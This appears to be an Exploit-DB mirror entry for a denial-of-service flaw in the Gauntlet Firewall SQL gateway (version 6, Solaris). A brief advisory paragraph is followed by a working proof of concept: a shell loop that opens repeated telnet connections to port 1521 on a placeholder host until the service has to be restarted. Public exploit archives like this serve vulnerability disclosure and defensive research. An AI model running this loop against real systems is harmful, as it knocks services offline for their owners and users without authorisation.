exploit-db-mirror/platforms/linux/dos/23172.txt
Offensive Security 5e2fc10125 DB: 2016-09-03
2016-09-03 13:13:25 +00:00

10 lines
No EOL
531 B
Text
Executable file

source: http://www.securityfocus.com/bid/8683/info
The Gauntlet Firewall SQL gateway (sql-gw) is prone to denial of service attacks. It is possible to trigger this condition by making multiple connections to the port which the service listens on. The service will need to be restarted to regain normal functionality.
This issue was reported for Gauntlet Firewall version 6, running on Solaris. Other versions may also be affected.
for a in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
do
telnet aaa.bbb.ccc.ddd 1521
done